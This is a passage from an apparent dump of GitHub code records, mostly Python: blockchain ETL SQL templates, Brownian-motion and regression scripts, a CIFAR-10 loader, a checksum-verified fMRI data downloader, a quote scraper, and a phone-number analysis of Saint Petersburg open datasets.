sum(COALESCE(cnb_blocks, 0))::BIGINT AS cnb_blocks,\n\n sum(COALESCE(out_txs, 0))::BIGINT AS out_txs,\n sum(COALESCE(vin_txs, 0))::BIGINT AS vin_txs,\n sum(COALESCE(cnb_txs, 0))::BIGINT AS cnb_txs,\n\n sum(COALESCE(out_xfers, 0))::BIGINT AS out_xfers,\n sum(COALESCE(vin_xfers, 0))::BIGINT AS vin_xfers,\n sum(COALESCE(cnb_xfers, 0))::BIGINT AS cnb_xfers,\n\n sum(COALESCE(out_value, 0))::NUMERIC AS out_value,\n sum(COALESCE(vin_value, 0))::NUMERIC AS vin_value,\n sum(COALESCE(cnb_value, 0))::NUMERIC AS cnb_value,\n sum(COALESCE(fee_value, 0))::NUMERIC AS fee_value,\n\n min(out_1th_st) AS out_1th_st,\n min(vin_1th_st) AS vin_1th_st,\n min(cnb_1th_st) AS cnb_1th_st,\n max(out_nth_st) AS out_nth_st,\n max(vin_nth_st) AS vin_nth_st,\n max(cnb_nth_st) AS cnb_nth_st,\n\n min(out_1th_blknum) AS out_1th_blknum,\n min(vin_1th_blknum) AS vin_1th_blknum,\n min(cnb_1th_blknum) AS cnb_1th_blknum,\n max(out_nth_blknum) AS out_nth_blknum,\n max(vin_nth_blknum) AS vin_nth_blknum,\n max(cnb_nth_blknum) AS cnb_nth_blknum,\n\n min(out_1th_st_day) AS out_1th_st_day,\n min(vin_1th_st_day) AS vin_1th_st_day,\n min(cnb_1th_st_day) AS cnb_1th_st_day,\n max(out_nth_st_day) AS out_nth_st_day,\n max(vin_nth_st_day) AS vin_nth_st_day,\n max(cnb_nth_st_day) AS cnb_nth_st_day\n FROM\n inout_flows\n WHERE\n address is not null -- in case the block reward data is missing\n GROUP BY\n 1\n) _\n \"\"\"\n)\n\nREAD_LOG_TEMPLATE = Template(\n \"\"\"\nSELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, logpos, address, topics, data\nFROM\n \"{{chain}}\".logs\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n{% if topics %}\n AND split_part(topics, ',', 1) IN (\n {%- for t in topics -%}'{{t}}'{%- if not loop.last -%}, {% endif -%}{%- endfor -%}\n )\n{% endif %}\n{% if addresses %}\n AND address IN (\n {%- for a in addresses -%}'{{a}}'{%- if not loop.last -%}, {% endif -%}{%- endfor -%}\n )\n{% endif %}\n\"\"\"\n)\n","repo_name":"jsvisa/blockchain-etl","sub_path":"ethereumetl/misc/eth_extract_balance.py","file_name":"eth_extract_balance.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"5950289541","text":"import math\nimport random\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\"\"\"\"\nmodel the path of a particle undergoing Brownian motion\n\"\"\"\n\nrandom.seed(0)\n\n\ndef wiener1(M, t):\n \"\"\"\n simulate a path of a particle undergoing Brownian motion for time [0; 1]\n :param M: number of additions\n :param t: time\n :param n: number of time steps\n :return: a list of M+1 values of the path of a particle undergoing Brownian motion\n \"\"\"\n eta_0 = random.gauss(0, 1)\n etas = [random.gauss(0, 1) for _ in range(M)]\n res = eta_0 * t + math.sqrt(2) * sum(\n [etas[i - 1] * math.sin(i * math.pi * t) / (i * math.pi) for i in range(1, M + 1)])\n return res\n\n\ndef wiener2(M, t):\n \"\"\"\n simulate a path of a particle undergoing Brownian motion for time [0; 1]\n :param M: number of additions\n :param t: time\n :return: a list of M+1 values of the path of a particle undergoing Brownian motion\n \"\"\"\n eta_0 = random.gauss(0, 1)\n etas_1 = [random.gauss(0, 1) for _ in range(M)]\n etas_2 = [random.gauss(0, 1) for _ in range(M)]\n res = eta_0 * t + math.sqrt(2) * sum([etas_1[i - 1] * math.sin(2 * i * math.pi * t) / (2 * i * math.pi) +\n etas_2[i - 1] * (1 - math.cos(2 * i * math.pi * t)) / (2 * i * math.pi)\n for i in range(1, M + 1)])\n return res\n\n\ndef variation(sequence_):\n return np.cumsum(abs(np.diff(sequence_, axis=0, prepend=0.)), axis=0)\n\n\nif __name__ == '__main__':\n n = 100\n the_value = 1\n time = [x / n for x in range(n + 1)] # time from 0 to 1 in 1000 steps\n\n # plot the graph\n plt.figure(figsize=(10, 4))\n samples = 100\n variations = []\n means = []\n reach_the_value = []\n for j in range(samples):\n print(f\"{j} / {samples}\")\n sequence = [wiener1(1000, t) for t in time]\n variations.append(variation(sequence))\n mean = sum(sequence) / len(sequence)\n means.append(mean)\n above_the_value = [x for x in sequence if x > the_value]\n time_to_reach_the_value = 1 if len(above_the_value) == 0 else sequence.index(above_the_value[0]) / n\n reach_the_value.append(time_to_reach_the_value)\n plt.plot(time, sequence)\n\n plt.xlabel('time')\n plt.ylabel('position')\n plt.show()\n\n # plot the quadratic variation\n plt.figure(figsize=(10, 4))\n for j in range(samples):\n plt.plot(time, variations[j])\n plt.xlabel('time')\n plt.ylabel('quadratic variation')\n plt.show()\n\n # plot the means\n plt.figure(figsize=(10, 4))\n plt.plot([x for x in range(samples)], means)\n plt.xlabel('sample')\n plt.ylabel('mean')\n plt.show()\n\n # plot the time to reach the value\n plt.figure(figsize=(10, 4))\n plt.plot([x for x in range(samples)], reach_the_value)\n # plot the mean time to reach the value\n plt.plot([x for x in range(samples)], [sum(reach_the_value) / len(reach_the_value) for _ in range(samples)])\n plt.xlabel('sample')\n plt.ylabel(f'time to reach the value a={the_value}')\n plt.show()\n","repo_name":"sasha0503/lab_stat_modelling_2","sub_path":"wiener.py","file_name":"wiener.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30092423604","text":"import numpy as np\n\ndef GetBackwardMA( In, wl ):\n\n InSize=In.shape\n NSize=InSize[0]\n nb=NSize\n\n Backward=np.zeros(nb, dtype=np.float16)\n\n # Apply moving averages based on number of dimensions (1-3)\n\n tmp=np.roll(In, -(wl-1))\n\n tmp=np.concatenate( ( tmp[nb-(wl-1):nb],tmp ) )\n\n \n for i in range(0, nb):\n \n Backward[i]=tmp[i:i+wl-1].sum()\n \n \n\n Backward=Backward/wl\n\n return Backward\n","repo_name":"gina-alaska/emodis_ndvi_python","sub_path":"pycodes/getbackwardma.py","file_name":"getbackwardma.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"13318463323","text":"import sys\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import BayesianRidge\nfrom sklearn.model_selection import RandomizedSearchCV\n\n#submit base file name\nfile_input = sys.argv[1]\n\n#sklearn Bayesian\nbase_regressor = BayesianRidge()\nlog_base_regressor = BayesianRidge()\n\ntuned_regressor = BayesianRidge()\nlog_tuned_regressor = BayesianRidge()\n\n#File Names from Base Name\ntrain_suffix = '_train.csv'\nvalidate_suffix = '_validate.csv'\ntest_suffix = '_test.csv'\n\n#Read Data from File\ndf_train = pd.read_csv(file_input + train_suffix)\ndf_validate = pd.read_csv(file_input + validate_suffix)\ndf_test = pd.read_csv(file_input + test_suffix)\n\n#Get the Features X into one Matrix and extract what we're looking for\ntrain_x, train_y, log_train_y = df_train.drop(columns=['Amount','log_Amount']), df_train['Amount'], df_train['log_Amount']\n\n#Finding Bayesian Hyperparameters\nbayesian_param = {\n 'alpha_1': np.linspace(1e-2,4,num=100),\n 'alpha_2': np.linspace(1e-2,4,num=100),\n 'lambda_1': np.linspace(1e-2,4,num=100),\n 'lambda_2':np.linspace(1e-2,4,num=100)\n}\n\n#Randomized Search to find the best hyperparameters\nbase_regressor.fit(train_x,train_y)\nlog_base_regressor.fit(train_x, log_train_y)\n\n#Randomized Search to find the best hyperparameters\ntuned_cv = RandomizedSearchCV(tuned_regressor, param_distributions=bayesian_param,n_iter=100, cv=10, verbose=1,n_jobs=10,random_state=1)\ntuned_cv.fit(train_x,train_y)\ntuned_param = tuned_cv.best_params_\n\nlog_tuned_cv = RandomizedSearchCV(log_tuned_regressor, param_distributions=bayesian_param,n_iter=100, cv=10, verbose=1,n_jobs=10,random_state=1)\nlog_tuned_cv.fit(train_x,log_train_y)\nlog_tuned_param = log_tuned_cv.best_params_\n\n#Model with hyperparamters\ntuned_model = BayesianRidge(alpha_1 = tuned_param['alpha_1'], alpha_2 = tuned_param['alpha_2'], lambda_1 = tuned_param['lambda_1'], lambda_2 = tuned_param['lambda_2'])\ntuned_model.fit(train_x,train_y)\n\n#Log model with hyperparameters\nlog_tuned_model = BayesianRidge(alpha_1 = log_tuned_param['alpha_1'], alpha_2 = log_tuned_param['alpha_2'], lambda_1 = log_tuned_param['lambda_1'], lambda_2 = log_tuned_param['lambda_2'])\nlog_tuned_model.fit(train_x, log_train_y)\n\n#Extract Data from the Validation data set to train the hyperparameter\nvalidate_x, validate_y, log_validate_y = df_validate.drop(columns=['Amount','log_Amount']), df_validate['Amount'], df_validate['log_Amount']\n\n#Here we compare validate our model to see which one is the best in this dataset.\nbase_predict_validate = base_regressor.predict(validate_x)\nlog_predict_validate = log_base_regressor.predict(validate_x)\ntuned_predict_validate = tuned_model.predict(validate_x)\nlog_tuned_predict_validate = log_tuned_model.predict(validate_x)\n\nbase_predict_data = {'validate_y':validate_y,'base_predict':base_predict_validate}\ndf_base_predict = pd.DataFrame(base_predict_data)\n\nlog_predict_data = {'log_validate_y':log_validate_y,'base_predict':log_predict_validate}\ndf_log_base_predict = pd.DataFrame(log_predict_data)\n\ntuned_predict_data = {'validate_y':validate_y,'base_predict':tuned_predict_validate}\ndf_tuned_predict = pd.DataFrame(tuned_predict_data)\n\nlog_tuned_predict_data = {'validate_y':validate_y,'base_predict':log_tuned_predict_validate}\ndf_log_tuned_predict = pd.DataFrame(log_tuned_predict_data)\n\n","repo_name":"albuut/Medical-Malpractice-Analysis","sub_path":"bayesian_regression.py","file_name":"bayesian_regression.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7176251825","text":"import requests\nimport bs4 \n\nauthor_list = set()\nquotes_list = []\ntags_list = set()\n\npage = 1\n\nwhile True:\n response = requests.get(f'http://quotes.toscrape.com/page/{page}/')\n soap = bs4.BeautifulSoup(response.text,'lxml')\n page += 1\n\n if 'No quotes found!' in soap.text:\n break\n\n for author in soap.select('.author'):\n author_list.add(author.text +'\\n') \n\n for quote in soap.select('.quote > span.text'):\n quotes_list.append(quote.text +'\\n') \n\n for tag in soap.select('.tag-item > .tag'):\n tags_list.add(tag.text +'\\n')\n\n \n \n\nwith open('./file/authors.txt','w') as t:\n t.write(\"\".join(author_list))\n\nwith open('./file/quotes.txt','w',encoding='utf-8') as t:\n t.write(\"\".join(quotes_list))\n\nwith open('./file/tags.txt','w') as t:\n t.write(\"\".join(tags_list))\n","repo_name":"Yeasiin/quotes_scrape","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"158700877","text":"import math\n\n# ---------- works with current notes with insert(i,x) inserting left of i ----------\n\nclass RotateArray:\n def __init__(self,n) -> None:\n self.arrays = []\n left = n\n nsqrt = math.ceil(math.sqrt(n))\n self.nsqrt = nsqrt\n while left > nsqrt:\n self.arrays.append([None for _ in range(nsqrt)])\n left -= nsqrt\n self.arrays.append([None for _ in range(nsqrt)])\n self.offsets = [0 for _ in range(len(self.arrays))]\n\n def get(self,i):\n r = i // self.nsqrt\n k = ((i % self.nsqrt) + self.offsets[r]) % self.nsqrt\n return self.arrays[r][k]\n\n def insert(self,i,x):\n r = i // self.nsqrt\n k = (i % self.nsqrt)\n self.__prop_over(r+1,self.arrays[r][self.offsets[r]-1])\n self.__rebuild_ins(r,k,x)\n\n def delete(self,i,):\n r = i // self.nsqrt\n k = (i % self.nsqrt)\n self.__rebuild__del(r,k)\n self.__prop_under(r+1)\n \n def __rebuild_ins(self,r,k,x):\n new = [None] * (self.nsqrt + 1)\n for i in range(self.nsqrt):\n oldindex = ((i % self.nsqrt) + self.offsets[r]) % self.nsqrt\n if i < k:\n new[i] = self.arrays[r][oldindex]\n elif i == k:\n new[k] = x\n new[i+1] = self.arrays[r][oldindex]\n else:\n new[i+1] = self.arrays[r][oldindex]\n self.arrays[r] = new[0:self.nsqrt]\n self.offsets[r] = 0\n \n def __rebuild__del(self,r,k):\n new = [None] * self.nsqrt\n for i in range(self.nsqrt):\n oldindex = ((i % self.nsqrt) + self.offsets[r]) % self.nsqrt\n if i < k:\n new[i] = self.arrays[r][oldindex]\n elif i > k:\n new[i-1] = self.arrays[r][oldindex]\n self.arrays[r] = new\n self.offsets[r] = 0\n \n def __prop_over(self,r,x):\n if x is None or r >= len(self.arrays): return\n tmp = self.arrays[r][self.offsets[r]]\n if tmp is not None:\n self.offsets[r] = (self.offsets[r] - 1) % self.nsqrt\n self.__prop_over(r+1,self.arrays[r][self.offsets[r]])\n self.arrays[r][self.offsets[r]] = x\n\n def __prop_under(self,r):\n if r >= len(self.arrays): return\n x = self.arrays[r][self.offsets[r]]\n if x is None: return\n self.arrays[r-1][self.offsets[r-1] - 1] = x\n self.arrays[r][self.offsets[r]] = None\n self.offsets[r] = (self.offsets[r] + 1) % self.nsqrt\n self.__prop_under(r+1)\n\n\n def __str__(self) -> str:\n\n return str(sum([[r[(i + o) % len(r)] for i in range(0,len(r)) if r[(i + o) % len(r)] is not None] for o,r in zip(self.offsets,self.arrays)],start=[]))\n\n def __repr__(self) -> str:\n return self.__str__()\n\n\n ","repo_name":"s194042/Algo2Helpers","sub_path":"RotatedArrays.py","file_name":"RotatedArrays.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6407573408","text":"import pickle\nimport numpy as np\nimport os\nfrom urllib.request import urlretrieve\nimport tarfile\nimport zipfile\nimport sys\nimport hickle\n\nimport deepdish\n\ndef loadbatchdata(name=\"train\"):\n x = None\n y = None\n\n hdfdata = []\n\n #maybe_download_and_extract()\n\n folder_name = \"cifar_10\"\n\n f = open('./data_set/'+folder_name+'/batches.meta', 'rb')\n f.close()\n\n if name is \"train\":\n for i in range(5):\n f = open('./data_set/'+folder_name+'/data_batch_' + str(i + 1), 'rb')\n datadict = pickle.load(f, encoding='latin1')\n\n hdfdata.append(datadict)\n\n hickle.dump(datadict, 'train'+str(i)+'.hkl', mode='w')\n\n #datadict = hickle.load(f)\n\n f.close()\n\n _X = datadict[\"data\"]\n _original_image = _X\n _Y = datadict['labels']\n\n _X = np.array(_X, dtype=float) / 255.0\n _X = _X.reshape([-1, 3, 32, 32])\n _X = _X.transpose([0, 2, 3, 1])\n _X = _X.reshape(-1, 32*32*3)\n\n if x is None:\n x = _X\n y = _Y\n original_image = _original_image\n else:\n x = np.concatenate((x, _X), axis=0)\n y = np.concatenate((y, _Y), axis=0)\n original_image = np.concatenate((original_image, _original_image), axis=0)\n\n elif name is \"test\":\n f = open('./data_set/'+folder_name+'/test_batch', 'rb')\n datadict = pickle.load(f, encoding='latin1')\n f.close()\n\n hickle.dump(datadict, 'test.hkl', mode='w')\n\n x = datadict[\"data\"]\n y = np.array(datadict['labels'])\n original_image = x\n x = np.array(x, dtype=float) / 255.0\n x = x.reshape([-1, 3, 32, 32])\n x = x.transpose([0, 2, 3, 1])\n x = x.reshape(-1, 32*32*3)\n hickle.dump(datadict, 'test' + '.hkl', mode='w')\n\n\n print(len(hdfdata))\n if name is \"train\":\n hickle.dump(hdfdata, 'train.hkl', mode='w')\n elif name is \"test\":\n hickle.dump(hdfdata, 'test.hkl', mode='w')\n\n #print(datadict.size)\n\n\n return x, dense_to_one_hot(y), original_image\n\n\ndef dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot\n\n\nif __name__ == \"__main__\":\n loadbatchdata(\"test\")\n","repo_name":"hbzhang/holodeep","sub_path":"holodeep/tensorflow-cifar-10/loadbatchdata.py","file_name":"loadbatchdata.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"37526346202","text":"from __future__ import print_function\n\nimport argparse\nimport glob\nimport os\nimport shutil\nimport hashlib\nimport zipfile\n\ntry:\n from urllib.request import urlretrieve\nexcept ImportError:\n from urllib import urlretrieve\n\nimport joblib\nimport numpy as np\nimport pandas as pd\n\nATLAS = ('basc064', 'basc122', 'basc197', 'craddock_scorr_mean',\n 'harvard_oxford_cort_prob_2mm', 'msdl', 'power_2011')\n\nARCHIVE = {atlas: 'https://storage.ramp.studio/autism/{}.zip'.format(atlas)\n for atlas in ATLAS}\n\nCHECKSUM = {\n 'basc064':\n '63dfe270cbe8e5fd9d70ff88e4bd7d053b68a98eea96bacf316f7f35bce2133f',\n 'basc122':\n 'fae1de1c3bd72493d32da7378d0f4f5595f7e7ebe07a5f2402ec3afc0cfa2d47',\n 'basc197':\n 'f1692b9e2ed6017b26d2731c785f6b3e66348eb4ecae9eb3cbdb7a69419ea77d',\n 'craddock_scorr_mean':\n '8952d5350812cb0e77e99187ef9eac6b67681057783e6154a4eee13eda5c8068',\n 'harvard_oxford_cort_prob_2mm':\n '93a88bf18ba13f9851b5a20a42a40c84d03b4ab42ca3b48a28581b07d90dd351',\n 'msdl':\n '4861c118d72ad5824594d2b9e601029dc3edde6f10e72bd9475742068475f4b3',\n 'power_2011':\n '1a94384d3f0b6ea313dfc1f72005175f8546e5d82971e765b114c31c487a645c'}\n\n\ndef _sha256(path):\n \"\"\"Calculate the sha256 hash of the file at path.\"\"\"\n sha256hash = hashlib.sha256()\n chunk_size = 8192\n with open(path, \"rb\") as f:\n while True:\n buffer = f.read(chunk_size)\n if not buffer:\n break\n sha256hash.update(buffer)\n return sha256hash.hexdigest()\n\n\ndef _check_and_unzip(output_file, atlas, atlas_directory):\n checksum_download = _sha256(output_file)\n if checksum_download != CHECKSUM[atlas]:\n os.remove(output_file)\n raise IOError('The file downloaded was corrupted. Try again '\n 'to execute this script.')\n\n print('Decompressing the archive ...')\n zip_ref = zipfile.ZipFile(output_file, 'r')\n zip_ref.extractall(atlas_directory)\n zip_ref.close()\n\n\ndef _download_fmri_data(atlas):\n print('Downloading the data from {} ...'.format(ARCHIVE[atlas]))\n output_file = os.path.abspath(\n os.path.join('.', 'data', 'fmri', atlas + '.zip'))\n urlretrieve(ARCHIVE[atlas], filename=output_file)\n atlas_directory = os.path.abspath(os.path.join('.', 'data', 'fmri'))\n _check_and_unzip(output_file, atlas, atlas_directory)\n\n\ndef _check_integrity_atlas(atlas):\n # check that the folder is existing\n atlas_directory = os.path.abspath(os.path.join('.', 'data', 'fmri', atlas))\n if os.path.isdir(atlas_directory):\n # compute the hash of the current data present on the disk\n filenames_atlas_current = np.array(\n glob.glob(os.path.join(atlas_directory, '*', '*', '*')),\n dtype=object)\n filenames_atlas_current.sort()\n current_hash = joblib.hash(filenames_atlas_current)\n\n # compute the expected hash from the data set which we provide\n filenames_atlas_expected = pd.read_csv(\n os.path.abspath(os.path.join('.', 'data', 'fmri_filename.csv')),\n index_col=0)[atlas].values\n for idx in range(filenames_atlas_expected.size):\n filenames_atlas_expected[idx] = os.path.abspath(\n os.path.join('data', filenames_atlas_expected[idx]))\n filenames_atlas_expected.sort()\n expected_hash = joblib.hash(filenames_atlas_expected)\n\n if current_hash == expected_hash:\n return\n\n shutil.rmtree(atlas_directory)\n\n _download_fmri_data(atlas)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Download the time series extracted from the '\n 'functional MRI data using a specific atlas.')\n parser.add_argument('atlas',\n default='all',\n help='Name of the atlas. One of {}. To download '\n 'all atlases, use \"all\".'.format(ATLAS))\n atlas = parser.parse_args().atlas\n\n if atlas == 'all':\n for single_atlas in ATLAS:\n _check_integrity_atlas(single_atlas)\n elif atlas in ATLAS:\n _check_integrity_atlas(atlas)\n else:\n raise ValueError(\"'atlas' should be one of {}. Got {} instead.\"\n .format(ATLAS, atlas))\n\n print('Downloading completed ...')\n","repo_name":"mahmud83/autism","sub_path":"download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"23373306725","text":"import pandas as pd\nimport re\nimport datetime\nfrom tabulate import tabulate\n\nlink_dataset = {\n\"Информация о местных администрациях внутригородских муниципальных образований Санкт-Петербурга (Версия №15 от 17.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7842140523-informaciya-o-mestnyh-administraciyah-vnutrigorodskih-municipalnyh-obrazovanij-sankt-peterburga/structure_version/218/\",\n \"dataset/informaciya-o-mestnyh-administraciyah-vnutrigorodskih-municipalnyh-obrazovanij-sankt-peterburga.csv\",\n \"Телефон\"],\n\"Информация о муниципальных советах внутригородских муниципальных образований Санкт-Петербурга (Версия №14 от 17.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7842140523-informaciya-o-municipalnyh-sovetah-vnutrigorodskih-municipalnyh-obrazovanij-sankt-peterburga/structure_version/220/\",\n \"dataset/informaciya-o-municipalnyh-sovetah-vnutrigorodskih-municipalnyh-obrazovanij-sankt-peterburga.csv\",\n \"телефон\"],\n\"Информация о спортивной подготовке детей и молодежи в Санкт-Петербурге (Версия №11 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002078-Informaciya-o-sportivnoj-podgotovke-detej-i-molodezhi-v-Sankt-Peterburge/structure_version/350/?page=3&per_page=50\",\n \"dataset/Informaciya-o-sportivnoj-podgotovke-detej-i-molodezhi-v-Sankt-Peterburge.csv\",\n \"Телефон\"],\n\"Перечень государственных учреждений по делам молодежи в Санкт-Петербурге (Версия №11 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002078-Perechen-gosudarstvennyh-uchrezhdenij-po-delam-molodezhi-v-Sankt-Peterburge/structure_version/357/?page=1&per_page=50\",\n \"dataset/Perechen-gosudarstvennyh-uchrezhdenij-po-delam-molodezhi-v-Sankt-Peterburge.csv\",\n \"Телефон\"],\n\"Перечень государственных учреждений, подведомственных Комитету по социальной политике Санкт-Петербурга (Версия №11 от 16.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7825675663-perechen-gosudarstvennyh-uchrezhdenij-podvedomstvennyh-Komitetu-po-socialnoj-politike-Sankt-Peterburga/structure_version/171/?page=1&per_page=50\",\n \"dataset/perechen-gosudarstvennyh-uchrezhdenij-podvedomstvennyh-Komitetu-po-socialnoj-politike-Sankt-Peterburga.csv\",\n \"Телефон\"],\n\"Перечень государственных учреждений культуры на территории района Санкт-Петербурга (Версия №14 от 12.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002078-Perechen-gosudarstvennyh-uchrezhdenij-kultury-na-territorii-rajona-Sankt-Peterburga/structure_version/324/?page=5&per_page=50\",\n \"dataset/Perechen-gosudarstvennyh-uchrezhdenij-kultury-na-territorii-rajona-Sankt-Peterburga.csv\",\n \"Телефон\"],\n\"Точки продаж билетов для проезда на наземном городском пассажирском транспорте (Версия №24 от 19.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830001067-tochki-prodazh-biletov-dlya-proezda-na-nazemnom-gorodskom-passazhirskom-transporte/structure_version/619/?page=1&per_page=50\",\n \"dataset/tochki-prodazh-biletov-dlya-proezda-na-nazemnom-gorodskom-passazhirskom-transporte.csv\",\n \"Телефон\"],\n\"Образовательные учреждения в сфере культуры (Версия №11 от 02.03.2021)\":\n [\n \"https://classif.gov.spb.ru/irsi/7808025993-education/structure_version/342/?page=1&per_page=50\",\n \"dataset/education.csv\",\n \"Телефон\"],\n\"Катки и лыжные трассы Санкт-Петербурга (Версия №25 от 08.12.2022)\":\n [\"https://classif.gov.spb.ru/irsi/7814348015-Katki-i-lyzhnye-trassy-SPbtwo/structure_version/618/?page=5&per_page=50\",\n \"dataset/Katki-i-lyzhnye-trassy-Sankt-Peterburga.csv\",\n \"Телефон(ы)\"],\n\"Информация о лечебно-профилактических учреждениях Санкт-Петербурга (Версия №10 от 15.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7808043833-info_health_service/structure_version/327/?page=4&per_page=50\",\n \"dataset/info_health_service.csv\",\n \"Телефон\"],\n\"Сведения о судебных участках мировых судей Санкт-Петербурга (Версия №1 от 18.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7842005651-svedeniya-o-sudebnyh-uchastkah-mirovyh-sudej-sankt-peterburga/structure_version/438/?page=5&per_page=50\",\n \"dataset/svedeniya-o-sudebnyh-uchastkah-mirovyh-sudej-sankt-peterburga.csv\",\n \"Телефон / факс\"],\n\"Перечень ресурсоснабжающих организаций - владельцев сетей инженерно-технического обеспечения и электрических сетей в Санкт-Петербурге (Версия №10 от 16.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7825363978-perechen-resursosnabzhayushih-organizacij-vladelcev-setej-inzhenerno-tehnicheskogo-obespecheniya-i-elektricheskih-setej-v-sankt-peterburge/structure_version/387/?page=1&per_page=50\",\n \"dataset/perechen-resursosnabzhayushih-organizacij-vladelcev-setej-inzhenerno-tehnicheskogo-obespecheniya-i-elektricheskih-setej-v-sankt-peterburge.csv\",\n \"Телефон для справок\"],\n\"Перечень образовательных организаций (школ, гимназий, лицеев) на территории района Санкт-Петербурга (Версия №10 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002078-Perechen-obrazovatelnyh-organizacij/structure_version/361/?page=10&per_page=50\",\n \"dataset/Perechen-obrazovatelnyh-organizacij-na-territorii-rajona-Sankt-Peterburga.csv\",\n \"Телефон\"],\n\"Государственные бюджетные образовательные учреждения Санкт-Петербурга, находящиеся в ведении Комитета по образованию (Версия №10 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002053-State_educational_institutions_of_Saint_Petersburg_under_control_of_the_Committee/structure_version/328/?page=1&per_page=50\",\n \"dataset/Gosudarstvennye-byudzhetnye-obrazovatelnye-uchrezhdeniya-Sankt-Peterburga-nahodyashiesya-v-vedenii-Komiteta-po-obrazovaniyu.csv\",\n \"Телефон\"],\n\"Информация о кладбищах Санкт-Петербурга, на которых предоставляются участки земли для погребения (Версия №10 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7838482852-Informaciya-o-kladbishah-Sankt-Peterburga-na-kotoryh-predostavlyayutsya-uchastki-zemli-dlya-pogrebeniya/structure_version/504/?page=2&per_page=50\",\n \"dataset/Informaciya-o-kladbishah-Sankt-Peterburga-na-kotoryh-predostavlyayutsya-uchastki-zemli-dlya-pogrebeniya.csv\",\n \"Телефон\"],\n\n}\n\nclass Analitic_Phone():\n def __init__(self, path: str, colum:str):\n self.path = path\n self.colum = colum\n\n # Возвращает датафрейм по столбцу телефона\n def read_csv_colum(self):\n col = pd.read_csv(self.path, delimiter=',')\n return col[self.colum]\n\n # количество записей в наборе\n def count_csv(self):\n count_csv = pd.read_csv(self.path).count()\n return count_csv[0]\n\n # количество не пустых номеров\n def count_not_null_phone(self):\n cnt=0\n for i in self.read_csv_colum():\n if isinstance(i, str):\n if re.sub(r'\\D', \"\", i) != \"\":\n cnt=cnt+1\n return cnt\n\n #количество городских телефонных номеров\n def count_gor_phone(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone=phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n else:\n phone=re.sub(r'\\D',\"\",phone)\n if type(phone) is list:\n for i in phone:\n i = re.sub(r'\\D', \"\", i)\n if re.search(\"^.812\", i) or re.search(\"^812\", i) or len(i) == 7:\n count_phone = count_phone + 1\n #print(i)\n elif re.search(\"^.812\", phone) or re.search(\"^812\", phone) or len(phone) == 7:\n count_phone = count_phone + 1\n #print(phone)\n return count_phone\n\n # количество мобильных телефонных номеров\n def count_mobile_phone(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n else:\n phone = re.sub(r'\\D', \"\", phone)\n if type(phone) is list:\n for i in phone:\n i = re.sub(r'\\D', \"\", i)\n if re.search(r\"^.9\", i) and len(i) == 11:\n #print(i)\n count_phone = count_phone + 1\n elif re.search(r\"^.9\", phone) and len(phone) == 11:\n #print(phone)\n count_phone = count_phone + 1\n return count_phone\n\n # количество телефонных номеров, с указанием кода страны\"\" (напр., +7-..., но не 8-...)\n def cont_code_country(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n cnt=phone.count(\"+7\")\n count_phone = count_phone + cnt\n return count_phone\n\n # количество телефонных номеров с указанием кода города или кода оператора сотовой связи\n def cont_operator_mobile(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n else:\n phone = re.sub(r'\\D', 